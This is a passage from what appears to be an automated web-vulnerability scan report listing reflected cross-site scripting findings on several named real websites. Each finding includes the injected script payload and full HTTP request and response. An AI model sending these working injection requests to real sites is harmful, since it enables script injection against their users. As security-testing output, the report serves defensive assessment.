HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3897 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.328. http://www.obdev.at/products/pebbles/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.obdev.at
Path:
/products/pebbles/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 23a09'><script>alert(1)</script>73bda44d8f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/pebbles/index.html?23a09'><script>alert(1)</script>73bda44d8f5=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:09:44 GMT Vary: Accept-Encoding Content-Length: 6722 Connection: close Content-Type: text/html X-Pad: avoid browser bug
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Pebbles - The Quick In Between Color Matching Game for t ...[SNIP]... <a href='/products/pebbles/index-de.html?23a09'><script>alert(1)</script>73bda44d8f5=1'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57505'><script>alert(1)</script>04483c897d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products57505'><script>alert(1)</script>04483c897d4/sharity/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3903 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14624'><script>alert(1)</script>44f6ac9b7e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/sharity14624'><script>alert(1)</script>44f6ac9b7e9/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3903 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9094d'><script>alert(1)</script>36fbf9ed792 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/sharity/index.html9094d'><script>alert(1)</script>36fbf9ed792 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3897 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.332. http://www.obdev.at/products/sharity/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.obdev.at
Path:
/products/sharity/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b46'><script>alert(1)</script>10085725898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/sharity/index.html?97b46'><script>alert(1)</script>10085725898=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 7581 Connection: close Content-Type: text/html X-Pad: avoid browser bug
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sharity 3 - SMBFS for Unix</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2519c'><script>alert(1)</script>6aa8a9631c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products2519c'><script>alert(1)</script>6aa8a9631c1/webyep/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:12:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:12:42 GMT Vary: Accept-Encoding Content-Length: 3901 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f14f'><script>alert(1)</script>0ab5160bb6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/webyep5f14f'><script>alert(1)</script>0ab5160bb6b/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:12:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:12:43 GMT Vary: Accept-Encoding Content-Length: 3901 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e8c1'><script>alert(1)</script>badd922506b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/webyep/index.html2e8c1'><script>alert(1)</script>badd922506b HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:12:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:12:43 GMT Vary: Accept-Encoding Content-Length: 3895 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.336. http://www.obdev.at/products/webyep/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.obdev.at
Path:
/products/webyep/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a771'><script>alert(1)</script>f5d360894ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/webyep/index.html?5a771'><script>alert(1)</script>f5d360894ff=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:12:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:12:20 GMT Vary: Accept-Encoding Content-Length: 7890 Connection: close Content-Type: text/html X-Pad: avoid browser bug
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>WebYep - The Shiny Tiny WebCMS</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e04dd'><script>alert(1)</script>ea6efcccaa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shope04dd'><script>alert(1)</script>ea6efcccaa5/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:13:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:13:01 GMT Vary: Accept-Encoding Content-Length: 3879 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90ee7'><script>alert(1)</script>bb025998b09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/index.html90ee7'><script>alert(1)</script>bb025998b09 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:13:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:13:03 GMT Vary: Accept-Encoding Content-Length: 3873 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.339. http://www.obdev.at/shop/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.obdev.at
Path:
/shop/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fb4a'><script>alert(1)</script>d64454b2502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/index.html?8fb4a'><script>alert(1)</script>d64454b2502=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:12:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:12:42 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 20921
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development - Shop</title>
4.340. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7979f'-alert(1)-'12735a7cb12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?7979f'-alert(1)-'12735a7cb12=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sat, 05 Feb 2011 22:07:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/ Content-Length: 102157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6e25'-alert(1)-'cbfdf312a0e was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_homeb6e25'-alert(1)-'cbfdf312a0e&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:23 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/ Content-Length: 102008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca69b'-alert(1)-'084dfeb0ca8 was submitted in the inav parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_home&inav=menu_business_openforumca69b'-alert(1)-'084dfeb0ca8 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:29 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/ Content-Length: 102388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.343. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f270e'-alert(1)-'17ac5158bd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f270e'-alert(1)-'17ac5158bd9=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2852890816.20480.0000; path=/ Content-Length: 101826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.344. http://www.owneriq.com/manuals-online [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.owneriq.com
Path:
/manuals-online
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a4b1"><script>alert(1)</script>18871e2d338 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /manuals-online?4a4b1"><script>alert(1)</script>18871e2d338=1 HTTP/1.1 Host: www.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46970937.1296942892.1.1.utmcsr=homeappliance.manualsonline.com|utmccn=(referral)|utmcmd=referral|utmcct=/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem; __utma=46970937.805338756.1296942892.1296942892.1296942892.1; __avc_31021=f64d-6178-34ed-5f2e12df7d201ca; __utmc=46970937; __utmb=46970937.1.10.1296942892; __alh_31021=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:02 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30208
4.345. http://www.owneriq.com/mostiq [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.owneriq.com
Path:
/mostiq
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7adc9"><script>alert(1)</script>31e937516d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mostiq?7adc9"><script>alert(1)</script>31e937516d5=1 HTTP/1.1 Host: www.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46970937.1296942892.1.1.utmcsr=homeappliance.manualsonline.com|utmccn=(referral)|utmcmd=referral|utmcct=/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem; __utma=46970937.805338756.1296942892.1296942892.1296942892.1; __avc_31021=f64d-6178-34ed-5f2e12df7d201ca; __utmc=46970937; __utmb=46970937.1.10.1296942892; __alh_31021=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:02 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27803
4.346. http://www.peppernews.eu/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.peppernews.eu
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d65"><script>alert(1)</script>f6336f06cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d7d65"><script>alert(1)</script>f6336f06cd4=1 HTTP/1.1 Host: www.peppernews.eu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:11:16 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=vd9g8hf893cbm16bpk18sfk1sfprvdrp; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 75749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="return" value="/?d7d65"><script>alert(1)</script>f6336f06cd4=1" /> ...[SNIP]...
4.347. http://www.pointehilton.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6b8"><script>alert(1)</script>9146d6140e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1e6b8"><script>alert(1)</script>9146d6140e3=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=16197162;expires=Mon, 28-Jan-2041 22:09:27 GMT;path=/ Set-Cookie: CFTOKEN=56010509;expires=Mon, 28-Jan-2041 22:09:27 GMT;path=/ Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerIMS-6=773065226.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/index.cfm?1e6b8"><script>alert(1)</script>9146d6140e3=1" > ...[SNIP]...
4.348. http://www.pointehilton.com/404.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/404.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1761c"><script>alert(1)</script>df41c02bb48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /404.cfm?1761c"><script>alert(1)</script>df41c02bb48=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:40:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/404.cfm?1761c"><script>alert(1)</script>df41c02bb48=1" > ...[SNIP]...
4.349. http://www.pointehilton.com/awards/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/awards/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7011e"><script>alert(1)</script>c1cb4f5731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /awards/index.cfm?7011e"><script>alert(1)</script>c1cb4f5731=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/awards/index.cfm?7011e"><script>alert(1)</script>c1cb4f5731=1" > ...[SNIP]...
4.350. http://www.pointehilton.com/contact/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/contact/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd987"><script>alert(1)</script>09d3033758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
